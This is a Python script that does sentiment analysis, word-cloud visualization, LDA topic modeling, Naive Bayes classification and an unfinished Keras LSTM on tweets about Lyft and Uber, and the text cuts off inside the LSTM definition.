tweet_summary = pd.pivot_table(tweet_non_neutral, values = ['compound'],index = ['date'], aggfunc = 'mean')
tweet_count = pd.pivot_table(tweet_non_neutral, values = ['compound'],index = ['date'], aggfunc = 'count')
tweet_all_count = pd.pivot_table(tweet_df, values = ['compound'],index = ['date'], aggfunc = 'count')
tweet_summary.reset_index(inplace = True, drop = False)
tweet_count.reset_index(inplace = True, drop = False)
tweet_all_count.reset_index(inplace = True, drop = False)
tweet_summary = pd.merge(tweet_summary,tweet_count, on = 'date', how = 'left')
tweet_summary = pd.merge(tweet_summary,tweet_all_count, on = 'date', how = 'left')
tweet_summary = tweet_summary.rename(index = str, columns = {'compound_x':'mean_compound','compound_y':'non_neutral_tweets','compound':'total_tweets'})
now = dt.datetime.strftime(dt.datetime.now(),"%Y-%m-%d")
tweet_df.to_csv("C://Users/jliv/Downloads/tweets/tweettest/"+terma+"tweets"+startdate+".csv")
tweet_summary.to_csv("C://Users/jliv/Downloads/tweets/"+terma+"scores"+startdate+".csv")
#Assemble all collected data for each brand
#560 - 631
imlist = listdir("C://Users/jliv/Downloads/tweets/tweettest/")
len(imlist)
lyftlist = [x for x in imlist if 'Lyfttweets' in x]
lyftdf = pd.read_csv('C://Users/jliv/Downloads/tweets/tweettest/'+lyftlist[0])
for i in lyftlist[1:]:
temp = pd.read_csv('C://Users/jliv/Downloads/tweets/tweettest/'+i)
lyftdf = lyftdf.append(temp)
lyftdf.reset_index(inplace= True, drop = True)
imlist = listdir("C://Users/jliv/Downloads/tweets/tweettest/")
len(imlist)
uberlist = [x for x in imlist if 'Ubertweets' in x]
uberdf = pd.read_csv('C://Users/jliv/Downloads/tweets/tweettest/'+uberlist[0])
for i in uberlist[1:]:
temp = pd.read_csv('C://Users/jliv/Downloads/tweets/tweettest/'+i)
uberdf = uberdf.append(temp)
uberdf.reset_index(inplace= True, drop = True)
lyftdf['comp'] = 'lyft'
uberdf['comp'] = 'uber'
nltk.download('wordnet')
stemmer = SnowballStemmer('english')
def lemmatize_stemming(text):
return stemmer.stem(WordNetLemmatizer().lemmatize(text, pos='v'))
def preprocess(text):
result = []
for token in gensim.utils.simple_preprocess(text):
if token not in gensim.parsing.preprocessing.STOPWORDS and len(token) > 3:
result.append(lemmatize_stemming(token))
return result
docdf = uberdf.append(lyftdf)
docdf.reset_index(inplace = True, drop = True)
docdf['final_tweets'] = docdf['final_tweets'].fillna(" ")
docs = list(docdf['final_tweets'])
docs1 = []
for i in docs:
x = i.lower().replace('lyft',"").replace('uber',"")
docs1.append(x)
docdf['final_tweets2'] = docs1
docdf2 = pd.pivot_table(data = docdf, index = ['final_tweets2'], values=['compound'], aggfunc = 'count')
docdf2.reset_index(inplace = True, drop = False)
#processed_docs = docdf2['final_tweets2'].map(preprocess)
processed_docs = docdf['final_tweets2'].map(preprocess)
merged = []
for i in processed_docs:
merged.append(" ".join(i))
docdf['final_tweets2_stemmed'] = merged
docdf.to_csv('C://Users/jliv/Downloads/tweets/tweets_collected.csv')
#Lyft Wordcloud
#641 - 794
tweetdf = pd.read_csv("C://Users/jliv/Downloads/tweets/tweets_collected.csv")
tweetdf = tweetdf[tweetdf['comp']=='lyft']
tweetdf.reset_index(inplace = True, drop = True)
tweetdf['final_tweets2_stemmed'] = tweetdf['final_tweets2_stemmed'].fillna(' ')
#CREATE WORDCLOUD WITH LABELED TWEETS
#Create df of each occurrence of word with scores of tweet
tweetlist = list(tweetdf['final_tweets2_stemmed'])
tokenized = []
compound = []
negative = []
neutral = []
positive = []
date = []
for i in range(len(tweetlist)):
tokenized.append(tweetlist[i].split())
compound.append(tweetdf['compound'][i])
negative.append(tweetdf['negative'][i])
neutral.append(tweetdf['neutral'][i])
positive.append(tweetdf['positive'][i])
date.append(tweetdf['date'][i])
words = []
compound2 = []
negative2 = []
neutral2 = []
positive2 = []
date2 = []
for i in range(len(tokenized)):
for j in tokenized[i]:
words.append(j.lower())
compound2.append(compound[i])
negative2.append(negative[i])
neutral2.append(neutral[i])
positive2.append(positive[i])
date2.append(date[i])
wordsdf = pd.DataFrame()
wordsdf['date'] = date2
wordsdf['words'] = words
wordsdf['compound'] = compound2
wordsdf['negative'] = negative2
wordsdf['neutral'] = neutral2
wordsdf['positive'] = positive2
#DFs of unique words with average score when used
wordssent = pd.pivot_table(data = wordsdf, values = ['compound','negative','neutral','positive'], index = ['words'], aggfunc = 'mean')
wordscount = pd.pivot_table(data = wordsdf, values = ['compound'], index = ['words'], aggfunc = 'count')
wordssent['count'] = wordscount['compound']
#Sorted by Use
wordssent.sort_values(by = 'count', ascending = False, inplace = True)
#Sorted by Negative Sentiment
words_negative_sent = wordssent.copy()
words_negative_sent.sort_values(by = 'compound', ascending = True, inplace = True)
words_negative_sent[words_negative_sent['count'] > 10]
#Sorted by Positive Sentiment
words_positive_sent = wordssent.copy()
words_positive_sent.sort_values(by = 'compound', ascending = False, inplace = True)
time_df = pd.pivot_table(tweetdf, index = 'date',values = 'compound', aggfunc = 'mean')
wordssent.reset_index(drop = False, inplace = True)
#Word cloud coloring helper
class SimpleGroupedColorFunc(object):
"""Create a color function object which assigns EXACT colors
to certain words based on the color to words mapping
Parameters
----------
color_to_words : dict(str -> list(str))
A dictionary that maps a color to the list of words.
default_color : str
Color that will be assigned to a word that's not a member
of any value from color_to_words.
"""
def __init__(self, color_to_words, default_color):
self.word_to_color = {word: color
for (color, words) in color_to_words.items()
for word in words}
self.default_color = default_color
def __call__(self, word, **kwargs):
return self.word_to_color.get(word, self.default_color)
compmin = min(wordssent['compound'])
compmax = max(wordssent['compound'])
compmin = -1
compmax = 1
n = 30
wordrepeats = []
wordrepeats_sent = []
for i,j,l in zip(list(wordssent[wordssent['count']>n]['words']),list(wordssent[wordssent['count']>n]['count']),list(wordssent[wordssent['count']>n]['compound'])):
for k in range(j):
wordrepeats.append(i.lower())
wordrepeats_sent.append(l)
text = " ".join(wordrepeats)
UW = []
color = []
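# Map each word's mean compound score onto a red (negative) to green (positive)
# color gradient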
for i,j in zip(list(wordssent[wordssent['count']>n]['words']),list(wordssent[wordssent['count']>n]['compound'])):
UW.append(i)
color.append('rgb('+str(int(255*(1- (j-compmin)/(compmax-compmin))))+','+str(int(155*(j-compmin)/(compmax-compmin)))+', 0)')
colorset = list(set(color))
color_to_words = {}
for i in colorset:
words_by_color = []
for j in range(len(UW)):
if color[j] == i:
words_by_color.append(UW[j])
else:
pass
color_to_words[i] = words_by_color
grouped_color_func = SimpleGroupedColorFunc(color_to_words, 'grey')
wordcloud = WordCloud(collocations = False,width = 800, height = 500,background_color = "black").generate(text)
wordcloud.recolor(color_func=grouped_color_func)
# Display the generated image:
# the matplotlib way:
plt.figure( figsize=(8,6) )
plt.imshow(wordcloud)
plt.axis("off")
plt.title("Lyft Word Cloud")
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/lyft_wordcloud.png")
#Uber Wordcloud
#800 - 963
#tweetdf = pd.read_csv('C://users/jliv/downloads/tweets/lda_tweets.csv')
tweetdf = pd.read_csv("C://Users/jliv/Downloads/tweets/tweets_collected.csv")
tweetdf = tweetdf[tweetdf['comp']=='uber']
tweetdf.reset_index(inplace = True, drop = True)
tweetdf['final_tweets2_stemmed'] = tweetdf['final_tweets2_stemmed'].fillna(' ')
#CREATE WORDCLOUD WITH LABELED TWEETS
#Create df of each occurrence of word with scores of tweet
tweetlist = list(tweetdf['final_tweets2_stemmed'])
tokenized = []
compound = []
negative = []
neutral = []
positive = []
date = []
for i in range(len(tweetlist)):
tokenized.append(tweetlist[i].split())
compound.append(tweetdf['compound'][i])
negative.append(tweetdf['negative'][i])
neutral.append(tweetdf['neutral'][i])
positive.append(tweetdf['positive'][i])
date.append(tweetdf['date'][i])
words = []
compound2 = []
negative2 = []
neutral2 = []
positive2 = []
date2 = []
for i in range(len(tokenized)):
for j in tokenized[i]:
words.append(j.lower())
compound2.append(compound[i])
negative2.append(negative[i])
neutral2.append(neutral[i])
positive2.append(positive[i])
date2.append(date[i])
wordsdf = pd.DataFrame()
wordsdf['date'] = date2
wordsdf['words'] = words
wordsdf['compound'] = compound2
wordsdf['negative'] = negative2
wordsdf['neutral'] = neutral2
wordsdf['positive'] = positive2
#DFs of unique words with average score when used
wordssent = pd.pivot_table(data = wordsdf, values = ['compound','negative','neutral','positive'], index = ['words'], aggfunc = 'mean')
wordscount = pd.pivot_table(data = wordsdf, values = ['compound'], index = ['words'], aggfunc = 'count')
wordssent['count'] = wordscount['compound']
#Sorted by Use
wordssent.sort_values(by = 'count', ascending = False, inplace = True)
#Sorted by Negative Sentiment
words_negative_sent = wordssent.copy()
words_negative_sent.sort_values(by = 'compound', ascending = True, inplace = True)
words_negative_sent[words_negative_sent['count'] > 10]
#Sorted by Positive Sentiment
words_positive_sent = wordssent.copy()
words_positive_sent.sort_values(by = 'compound', ascending = False, inplace = True)
time_df = pd.pivot_table(tweetdf, index = 'date',values = 'compound', aggfunc = 'mean')
#from PIL import Image, ImageDraw, ImageFont
#import math
# create Image object with the input image
#image = Image.open('background.png')
wordssent.reset_index(drop = False, inplace = True)
#Wordcloud wordcloud
class SimpleGroupedColorFunc(object):
    """Create a color function object which assigns EXACT colors
    to certain words based on the color to words mapping

    Parameters
    ----------
    color_to_words : dict(str -> list(str))
        A dictionary that maps a color to the list of words.

    default_color : str
        Color that will be assigned to a word that's not a member
        of any value from color_to_words.
    """

    def __init__(self, color_to_words, default_color):
        self.word_to_color = {word: color
                              for (color, words) in color_to_words.items()
                              for word in words}
        self.default_color = default_color

    def __call__(self, word, **kwargs):
        return self.word_to_color.get(word, self.default_color)
compmin = min(wordssent['compound'])
compmax = max(wordssent['compound'])
compmin = -1
compmax = 1
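# (added note) Pinning compmin/compmax to -1 and 1 fixes the color scale to the
# full VADER compound range, so a word's color is comparable across clouds. Per
# the mapping below: j = -1 -> 'rgb(255,0, 0)' (red), j = 0 -> 'rgb(127,77, 0)',
# j = 1 -> 'rgb(0,155, 0)' (green).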
n = 30
wordrepeats = []
wordrepeats_sent = []
for i,j,l in zip(list(wordssent[wordssent['count']>n]['words']),list(wordssent[wordssent['count']>n]['count']),list(wordssent[wordssent['count']>n]['compound'])):
    for k in range(j):
        wordrepeats.append(i.lower())
        wordrepeats_sent.append(l)
text = " ".join(wordrepeats)
UW = []
color = []
for i,j in zip(list(wordssent[wordssent['count']>n]['words']),list(wordssent[wordssent['count']>n]['compound'])):
    UW.append(i)
    color.append('rgb('+str(int(255*(1- (j-compmin)/(compmax-compmin))))+','+str(int(155*(j-compmin)/(compmax-compmin)))+', 0)')
colorset = list(set(color))
color_to_words = {}
for i in colorset:
    words_by_color = []
    for j in range(len(UW)):
        if color[j] == i:
            words_by_color.append(UW[j])
        else:
            pass
    color_to_words[i] = words_by_color
grouped_color_func = SimpleGroupedColorFunc(color_to_words, 'grey')
wordcloud = WordCloud(collocations = False,width = 800, height = 500,background_color = "black").generate(text)
wordcloud.recolor(color_func=grouped_color_func)
# Display the generated image:
# the matplotlib way:
plt.figure( figsize=(8,6) )
plt.imshow(wordcloud)
plt.axis("off")
plt.title("Uber Word Cloud")
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/uber_wordcloud.png")
#Topic Modeling TFIDF and LDA
#967 - 1088
tweetdf = pd.read_csv("C://Users/jliv/Downloads/tweets/tweets_collected.csv")
tweetdf['final_tweets2'] = tweetdf['final_tweets2'].fillna(" ")
processed_docs = tweetdf['final_tweets2'].map(preprocess)
dictionary = gensim.corpora.Dictionary(processed_docs)
count = 0
for k, v in dictionary.iteritems():
    print(k, v)
    count += 1
    if count > 100:
        break
dictionary.filter_extremes(no_below=2, no_above=0.09, keep_n=1000)  # drop tokens in fewer than 2 docs or in more than 9% of docs, then keep the 1000 most frequent
#len(dictionary)
bow_corpus = [dictionary.doc2bow(doc) for doc in processed_docs]
#Method 1 BAG OF WORDS LDA
lda_model = gensim.models.LdaMulticore(bow_corpus, num_topics=4, id2word=dictionary, passes=2, workers=2)
for idx, topic in lda_model.print_topics(-1):
    print('Topic: {} \nWords: {}'.format(idx, topic))
#Method 2 TF-IDF LDA
#Fit Model
tfidf = models.TfidfModel(bow_corpus)
#Apply Model
corpus_tfidf = tfidf[bow_corpus]
lda_model_tfidf = gensim.models.LdaMulticore(corpus_tfidf, num_topics=4, id2word=dictionary, passes=2, workers=4)
model_info = []
for idx, topic in lda_model_tfidf.print_topics(-1):
    model_info.append('Topic: {} Word: {}'.format(idx, topic))
filename = 'C://Users/jliv/downloads/tweets/lda_tdidf.mod'
pickle.dump(lda_model_tfidf, open(filename, 'wb'))
for index, score in sorted(lda_model_tfidf[bow_corpus[500]], key=lambda tup: -1*tup[1]):
    print("\nScore: {}\t \nTopic: {}".format(score, lda_model_tfidf.print_topic(index, 5)))
topic = []
for i in list(tweetdf['final_tweets2']):
    unseen_document = i
    bow_vector = dictionary.doc2bow(preprocess(unseen_document))
    bv2 = tfidf[bow_vector]
    topic.append(sorted(lda_model_tfidf[bv2], key=lambda tup: -1*tup[1])[0][0])
    #topic.append(sorted(lda_model_tfidf[bow_vector], key=lambda tup: -1*tup[1])[0][0])
    #topic.append(sorted(lda_model[bow_corpus], key=lambda tup: -1*tup[1])[0][0])
#unseen_document = 'my driver was terrible'
#bow_vector = dictionary.doc2bow(preprocess(unseen_document))
#for index, score in sorted(lda_model[bow_vector], key=lambda tup: -1*tup[1])[0][0]:
# print("Score: {}\t Topic: {}".format(score, lda_model.print_topic(index, 5)))
tweetdf['ldatopic'] = topic
tfidflist_tweetlevel = []
for i in range(len(processed_docs)):
    tfidflist_tweetlevel.append(corpus_tfidf[i])
tweetdf['tfidf'] = tfidflist_tweetlevel
tweetdf['processed_docs'] = processed_docs
tfidflen = []
doclen = []
for i in range(len(corpus_tfidf)):
    tfidflen.append(len(corpus_tfidf[i]))
    doclen.append(len(processed_docs[i]))
tweetdf['tfidflen'] = tfidflen  # was tfidflist_tweetlevel, a copy-paste slip; the loop above fills tfidflen
tweetdf['doclen'] = doclen  # was processed_docs, same slip
tweetdf['final_tweets2_stemmed'] = tweetdf['final_tweets2_stemmed'].fillna(" ")
docss = len(tweetdf)
tfidflist_jl = []
tfidflist_jl_norm = []
for i in range(len(tweetdf)):
    twt = processed_docs[i]
    tmptfidf = []
    for j in twt:
        worddocs = len(tweetdf[tweetdf['final_tweets2_stemmed'].str.contains(j)])
        idf = np.log(docss/worddocs)
        tf = sum(1 for k in twt if k == j)/len(twt)
        tfidfres = tf*idf
        tmptfidf.append(tfidfres)
    try:
        # normalize by the max score; a plain Python list has no '/' operator,
        # so the original expression always raised and fell through to except
        tmptfidf_n = list(np.array(tmptfidf)/max(tmptfidf))
    except ValueError:  # max() of an empty document
        tmptfidf_n = [1]
    tfidflist_jl_norm.append(tmptfidf_n)
    tfidflist_jl.append(tmptfidf)
tfidfsums = []
for i in tfidflist_jl:
    tfidfsums.append(sum(i))
tfidfvect = []
for i in tfidflist_jl:
    for j in i:
        tfidfvect.append(j)
plt.hist(tfidfvect, bins = 40)
plt.show()
tweetdf['tfidf_jl'] = tfidflist_jl
tweetdf['tfidflist_jl_norm'] = tfidflist_jl_norm
tweetdf.to_csv("C://users/jliv/downloads/tweets/tweets_collected_lda_tfidf.csv")
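# --- Added sketch (not in the original script): sanity-check the hand-rolled
# TF-IDF against gensim's TfidfModel for one tweet. The two use different
# conventions (tf = count/len vs. raw counts; natural log vs. log2; gensim
# L2-normalizes), so magnitudes differ, but the within-tweet ranking of terms
# should broadly agree. doc_id is an illustrative index.
doc_id = 0
manual_scores = dict(zip(processed_docs[doc_id], tfidflist_jl[doc_id]))
gensim_scores = {dictionary[word_id]: score for word_id, score in corpus_tfidf[doc_id]}
for w in sorted(gensim_scores, key=gensim_scores.get, reverse=True)[:5]:
    print(w, round(gensim_scores[w], 3), round(manual_scores.get(w, 0.0), 3))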
#Naive Bayes Classifier
#1095 - 1167
tweetdf = pd.read_csv("C://users/jliv/downloads/tweets/tweets_collected_lda_tfidf.csv")
corpuslist = listdir("C://Users/jliv/Downloads/tweets/corpus/")
corpusdf = pd.read_csv("C://Users/jliv/Downloads/tweets/corpus/"+corpuslist[0])
for i in corpuslist[1:]:
    corpusdf = corpusdf.append(pd.read_csv("C://Users/jliv/Downloads/tweets/corpus/"+i))
def document_features(document):
    document_words = set(document)
    features = {}
    for word in word_features:
        features['contains({})'.format(word)] = (word in document_words)
    return features
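# Example (added for illustration):
#   document_features(['uber', 'driver', 'great'])
#   -> {'contains(uber)': True, 'contains(the)': False, ...}
# i.e. one boolean feature per entry in word_features.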
corpusdf['count'] = 1
corpusdf2 = pd.pivot_table(data = corpusdf, index = ['final_tweets','label'], values = ['count'], aggfunc = 'sum')
corpusdf2.reset_index(inplace=True, drop = False)
corpusdf2['final_tweets'] = corpusdf2['final_tweets'].fillna(" ")
rand_tweets_labels = list(corpusdf2['label'])
unique_tweets = list(corpusdf2['final_tweets'])
tweet_doc = []
for i in unique_tweets:
    x = i.lower()
    tweet_doc.append(x.split())
unique_words = []
for i in unique_tweets:
    x = i.split()
    for j in x:
        unique_words.append(j.lower())
UW = pd.DataFrame()
UW['unique_words'] = unique_words
UW['count'] = 1
UW_piv = pd.pivot_table(data = UW, values = 'count', index = 'unique_words', aggfunc = 'sum')
UW_piv = UW_piv.sort_values(by = 'count', ascending = False)
unique_words2 = list(UW_piv.index)
dropping = ['i','the','``',"''"]
unique_words3 = [i for i in unique_words2 if i not in dropping]
word_features =unique_words3[:300]
ww = UW_piv.copy()
ww.reset_index(inplace= True)
ww = list(ww[(ww['count'] >= 20)&(ww['count'] <= 30)]['unique_words'])
word_features = list(word_features)+ww
#word_features =unique_words3
from random import shuffle
tweet_featset = [(document_features(d), c) for (d,c) in zip(tweet_doc,rand_tweets_labels)]
tweet_featset2 = tweet_featset  # NB: same list object, so the shuffle below also reorders tweet_featset
shuffle(tweet_featset2)
# NOTE: train and test here are the identical full labeled set, so the accuracy
# computed below is a resubstitution score; the commented-out split on the next
# line would give a true holdout estimate.
train_set, test_set = tweet_featset[:len(tweet_featset)], tweet_featset[:len(tweet_featset)]
#train_set, test_set = tweet_featset2[:int(len(tweet_featset2)*.75)], tweet_featset2[int(len(tweet_featset2)*.75):]
classifier = nltk.NaiveBayesClassifier.train(train_set)
classifier.show_most_informative_features(30)
print('training-set accuracy:', nltk.classify.accuracy(classifier, test_set))  # bare expression in the original; wrapped in print so the script reports it
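# --- Added sketch (not in the original): a minimal holdout evaluation using a
# 75/25 split, mirroring the commented-out line above. The resubstitution
# accuracy printed above will typically overstate real performance.
split_at = int(len(tweet_featset2) * 0.75)
heldout_clf = nltk.NaiveBayesClassifier.train(tweet_featset2[:split_at])
print('holdout accuracy:', nltk.classify.accuracy(heldout_clf, tweet_featset2[split_at:]))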
unique_tweets = tweetdf['final_tweets']
tweets_split = []
for i in unique_tweets:
    tweets_split.append(i.split())
new_labels = []
probs = []
for i in tweets_split:
    test_features = [(document_features(i), 'test')]
    new_labels.append(classifier.classify(test_features[0][0]))
    dist = classifier.prob_classify(test_features[0][0])
    probs.append(dist.prob(classifier.classify(test_features[0][0])))
tweetdf['NB_label'] = new_labels
tweetdf['NB_label_prob'] = probs
tweetdf.to_csv("C://users/jliv/downloads/tweets/tweets_NBC_Labels.csv")
len(tweetdf[tweetdf['NB_label']=='promotional']['text'])
#Time Sentiment and Topic Analysis by Naive Bayes Label
#1171 - 1321
tweetdf = pd.read_csv("C://users/jliv/downloads/tweets/tweets_NBC_Labels.csv")
lyftdf1 = tweetdf[tweetdf['comp']=='lyft']
uberdf1 = tweetdf[tweetdf['comp']=='uber']
ubermean = np.mean(uberdf1['compound'])
lyftmean = np.mean(lyftdf1['compound'])
lyftscoresdf = pd.pivot_table(data = lyftdf1, index = ['NB_label'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf1, index = ['NB_label'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10.5,8))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.title('Naive Bayes Classifier Topics: Lyft Promo Tweets are more positive, Otherwise Similar Sentiment')
plt.legend(loc = 2)
plt.xticks(range(4),list(lyftscoresdf['NB_label']), rotation = 45)
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Topics_Sentiment_NBC.png")
plt.show()
lyftscoresdf = pd.pivot_table(data = lyftdf1, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf1, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10,8))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 2)
plt.title('NBC Topic ALL: Few meaningful differences, lower dives for Uber Sentiment')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_NBC.png")
plt.show()
topic = 'financial'
lyftdf2 = lyftdf1[lyftdf1['NB_label']==topic]
uberdf2 = uberdf1[uberdf1['NB_label']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10,8))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 2)
plt.title('NBC Topic '+str(topic)+': Highly Correlated, Not Meaningfully Different')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_Financial_NBC.png")
plt.show()
topic = 'service'
lyftdf2 = lyftdf1[lyftdf1['NB_label']==topic]
uberdf2 = uberdf1[uberdf1['NB_label']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10,8))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 1)
plt.title('NBC Topic '+str(topic)+': Highly Correlated, Not Meaningfully Different')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_Service_NBC.png")
plt.show()
topic = 'promotional'
lyftdf2 = lyftdf1[lyftdf1['NB_label']==topic]
uberdf2 = uberdf1[uberdf1['NB_label']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
lumerge = pd.merge(left = lyftscoresdf, right = uberscoresdf, on = 'date', how = 'left')
fig = plt.figure(figsize = (10,8))
plt.plot(lumerge['compound_x'], label = 'Lyft Average Sentiment')
plt.plot(lumerge['compound_y'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.ylim((-.2,1.2))
plt.legend(loc = 2)
plt.title('NBC Topic '+str(topic)+': Few Uber Tweets Classified Promotional')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_Promotional_NBC.png")
plt.show()
topic = 'news'
lyftdf2 = lyftdf1[lyftdf1['NB_label']==topic]
uberdf2 = uberdf1[uberdf1['NB_label']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10,8))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 2)
plt.title('Topic '+str(topic)+': Not Meaningfully Different')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_News_NBC.png")
plt.show()
##Classification with Tensor Flow and Sentence Convolution
#1327 - 1437
#Total Corpus of Words
txt_twt = tweetdf['processed_docs']
corpusdf = pd.read_csv("C://Users/jliv/Downloads/tweets/corpus/"+corpuslist[0])
for i in corpuslist[1:]:
    corpusdf = corpusdf.append(pd.read_csv("C://Users/jliv/Downloads/tweets/corpus/"+i))
corpusdf['final_tweets'] = corpusdf['final_tweets'].fillna(" ")
corpusdf['processed_docs'] = corpusdf['final_tweets'].map(preprocess)
twtcrp = corpusdf['processed_docs']
#txt_twt = txt_twt.fillna([" "])
#twtcrp = twtcrp.fillna([" "])
wds = []
for i in txt_twt:
    for j in i:
        try:
            wds.append(j)
        except:
            pass
for i in twtcrp:
    for j in i:
        try:
            wds.append(j)
        except:
            pass
dat = pd.DataFrame()
dat['wds'] = wds
dat['cnt'] = 1
UWs = pd.pivot_table(data = dat, index = ['wds'],values = ['cnt'], aggfunc = 'sum' )
UWs['rng'] = list(range(len(UWs)))
UWs.drop(['cnt'], inplace = True, axis = 1)
uwdict = UWs.to_dict()
uwdict = uwdict['rng']
twtcrp.reset_index(inplace= True, drop = True)
ls = []
for i in twtcrp:
    ls.append(len(i))
maxes = max(ls)
nndocs = []
for i in twtcrp:
    tmp = []
    for j in i:
        try:
            tmp.append(uwdict[j])
        except:
            tmp.append(-1)
    lentemp = len(tmp)
    for k in range(maxes-lentemp):
        tmp.append(-1)
    nndocs.append(np.array(tmp))
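# (added note) Unknown words and right-padding both map to -1 above, so the
# network cannot distinguish out-of-vocabulary tokens from padding; a separate
# pad id (e.g. len(uwdict)) would keep the two cases distinct.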
nndf = pd.DataFrame(nndocs)
nndocs2 = np.array(nndf)
nndocs2.shape
labs = np.array(corpusdf['label'])
labs.shape
#nndocs = nndocs.transpose()
encoder2 = LabelEncoder()
encoder2.fit(labs)
encoded_Ytrain = encoder2.transform(labs)
# convert integers to dummy variables (i.e. one hot encoded)
dummy_labs = np_utils.to_categorical(encoded_Ytrain)
#dummy_labs = dummy_labs.reshape(13898, 4,1)
dummy_labs.shape
nndocs2= nndocs2.reshape(13898,1,38)
dummy_labs= dummy_labs.reshape(13898,1,4)
nndocs2[0].shape
# kernel_size=(4,1)
# leftover from the commented-out ConvLSTM2D experiment further below: the 5-D
# reshape is immediately undone by the 3-D reshape the LSTM actually consumes
nndocs2= nndocs2.reshape(13898,1,1,1,38)
dummy_labs= dummy_labs.reshape(13898,1,1,1,4)
nndocs2= nndocs2.reshape(13898,1,38)
dummy_labs= dummy_labs.reshape(13898,1,4)
IS = nndocs2[0].shape
model = keras.Sequential()
'''model.add(keras.layers.Conv1D(40,kernel_size = (4),activation='sigmoid',input_shape=(None,787), padding='same'))
model.add(keras.layers.Dense(299, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(15, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(4, activation=tensorflow.nn.relu))'''
'''model.add(keras.layers.Conv1D(40,kernel_size = (6),strides = 1,activation='relu',input_shape=(None,38), padding='same'))
model.add(keras.layers.Dense(38, activation=tensorflow.nn.relu))
model.add(keras.layers.Conv1D(40,kernel_size = (6),strides = 1,activation='relu',input_shape=(None,38), padding='same'))
model.add(keras.layers.Dense(38, activation=tensorflow.nn.relu))
model.add(keras.layers.Conv1D(40,kernel_size = (6),strides = 1,activation='relu',input_shape=(None,38), padding='same'))
model.add(keras.layers.Dense(38, activation=tensorflow.nn.relu))
model.add(keras.layers.Conv1D(40,kernel_size = (6),strides = 1,activation='relu',input_shape=(None,38), padding='same'))
model.add(keras.layers.Dense(38, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(4, activation=tensorflow.nn.sigmoid))'''
#model.add(keras.layers.ConvLSTM2D(120,input_shape=(None,None,None,38), kernel_size = (6), strides=(1), padding='same', data_format=None, dilation_rate=1, activation='tanh', recurrent_activation='hard_sigmoid', use_bias=True, kernel_initializer='glorot_uniform', recurrent_initializer='orthogonal', bias_initializer='zeros', unit_forget_bias=True, kernel_regularizer=None, recurrent_regularizer=None, bias_regularizer=None, activity_regularizer=None, kernel_constraint=None, recurrent_constraint=None, bias_constraint=None, return_sequences=True, go_backwards=True, stateful=False, dropout=0.0, recurrent_dropout=0.0))
model.add(keras.layers.LSTM(120, activation='tanh', recurrent_activation='hard_sigmoid', \
use_bias=True, kernel_initializer='glorot_uniform', recurrent_initializer='orthogonal',
bias_initializer='zeros', unit_forget_bias=True, kernel_regularizer=None,
